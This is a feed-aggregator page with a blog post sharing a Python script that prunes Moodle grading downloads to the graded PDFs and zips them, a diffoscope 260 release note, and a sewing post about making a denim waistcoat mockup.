#!/usr/bin/python3 # Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ This script aims to take a directory containing PDF files exported via the Moodle mass download function, remove everything but the final files to submit back to the students and zip it back. usage: ./moodle-zip.py <target_dir> """ import os import shutil import sys import tempfile from fnmatch import fnmatch def sanity(directory): """Run sanity checks before doing anything else""" base_directory = os.path.basename(os.path.normpath(directory)) if not os.path.isdir(directory): sys.exit(f"Target directory {directory} is not a valid directory") if os.path.exists(f"/tmp/{base_directory}.zip"): sys.exit(f"Final ZIP file path '/tmp/{base_directory}.zip' already exists") for root, dirnames, _ in os.walk(directory): for dirname in dirnames: corrige_present = False for file in os.listdir(os.path.join(root, dirname)): if fnmatch(file, 'graded paper.pdf'): corrige_present = True if corrige_present is False: sys.exit(f"Directory {dirname} does not contain a 'graded paper.pdf' file") def clean(directory): """Remove superfluous files, to keep only the graded PDF""" with tempfile.TemporaryDirectory() as tmp_dir: shutil.copytree(directory, tmp_dir, dirs_exist_ok=True) for root, _, filenames in os.walk(tmp_dir): for file in filenames: if not fnmatch(file, 'graded paper.pdf'): os.remove(os.path.join(root, file)) compress(tmp_dir, directory) def compress(directory, target_dir): """Compress directory into a ZIP file and save it to the target dir""" target_dir = os.path.basename(os.path.normpath(target_dir)) shutil.make_archive(f"/tmp/{target_dir}", 'zip', directory) print(f"Final ZIP file has been saved to '/tmp/{target_dir}.zip'") def main(): """Main function""" target_dir = sys.argv[1] sanity(target_dir) clean(target_dir) if __name__ == "__main__": main()

If for some reason you happen to have a similar workflow as I and end up using this script, hit me up?

Now, back to grading...

  1. If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons... 

Categories: FLOSS Project Planets

Reproducible Builds (diffoscope): diffoscope 260 released

Thu, 2024-03-07 19:00

The diffoscope maintainers are pleased to announce the release of diffoscope version 260. This version includes the following changes:

[ Chris Lamb ] * Actually test 7z support in the test_7z set of tests, not the lz4 functionality. (Closes: reproducible-builds/diffoscope#359) * In addition, correctly check for the 7z binary being available (and not lz4) when testing 7z. * Prevent a traceback when comparing a contentful .pyc file with an empty one. (Re: Debian:#1064973)

You find out more by visiting the project homepage.

Categories: FLOSS Project Planets

Valhalla's Things: Denim Waistcoat

Thu, 2024-03-07 19:00
Posted on March 8, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

I had finished sewing my jeans, I had a scant 50 cm of elastic denim left.

Unrelated to that, I had just finished drafting a vest with Valentina, after the Cutters’ Practical Guide to the Cutting of Ladies Garments.

A new pattern requires a (wearable) mockup. 50 cm of leftover fabric require a quick project. The decision didn’t take a lot of time.

As a mockup, I kept things easy: single layer with no lining, some edges finished with a topstitched hem and some with bias tape, and plain tape on the fronts, to give more support to the buttons and buttonholes.

I did add pockets: not real welt ones (too much effort on denim), but simple slits covered by flaps.

piece; there is a slit in the middle that has been finished with topstitching.

To do them I marked the slits, then I cut two rectangles of pocketing fabric that should have been as wide as the slit + 1.5 cm (width of the pocket) + 3 cm (allowances) and twice the sum of as tall as I wanted the pocket to be plus 1 cm (space above the slit) + 1.5 cm (allowances).

Then I put the rectangle on the right side of the denim, aligned so that the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut, turned the pocketing to the wrong side, pressed and topstitched 2 mm from the fold to finish the slit.

other sides; it does not lay flat on the right side of the fabric because the finished slit (hidden in the picture) is pulling it.

Then I turned the pocketing back to the right side, folded it in half, sewed the side and top seams with a small allowance, pressed and turned it again to the wrong side, where I sewed the seams again to make a french seam.

And finally, a simple rectangular denim flap was topstitched to the front, covering the slits.

I wasn’t as precise as I should have been and the pockets aren’t exactly the right size, but they will do to see if I got the positions right (I think that the breast one should be a cm or so lower, the waist ones are fine), and of course they are tiny, but that’s to be expected from a waistcoat.

The other thing that wasn’t exactly as expected is the back: the pattern splits the bottom part of the back to give it “sufficient spring over the hips”. The book is probably published in 1892, but I had already found when drafting the foundation skirt that its idea of “hips” includes a bit of structure. The “enough steel to carry a book or a cup of tea” kind of structure. I should have expected a lot of spring, and indeed that’s what I got.

To fit the bottom part of the back on the limited amount of fabric I had to piece it, and I suspect that the flat felled seam in the center is helping it sticking out; I don’t think it’s exactly bad, but it is a peculiar look.

Also, I had to cut the back on the fold, rather than having a seam in the middle and the grain on a different angle.

Anyway, my next waistcoat project is going to have a linen-cotton lining and silk fashion fabric, and I’d say that the pattern is good enough that I can do a few small fixes and cut it directly in the lining, using it as a second mockup.

As for the wrinkles, there is quite a bit, but it looks something that will be solved by a bit of lightweight boning in the side seams and in the front; it will be seen in the second mockup and the finished waistcoat.

As for this one, it’s definitely going to get some wear as is, in casual contexts. Except. Well, it’s a denim waistcoat, right? With a very different cut from the “get a denim jacket and rip out the sleeves”, but still a denim waistcoat, right? The kind that you cover in patches, right?

And I may have screenprinted a “home sewing is killing fashion” patch some time ago, using the SVG from wikimedia commons / the Home Taping is Killing Music page.

And. Maybe I’ll wait until I have finished the real waistcoat. But I suspect that one, and other sewing / costuming patches may happen in the future.

No regrets, as the words on my seam ripper pin say, right? :D

Categories: FLOSS Project Planets

Pages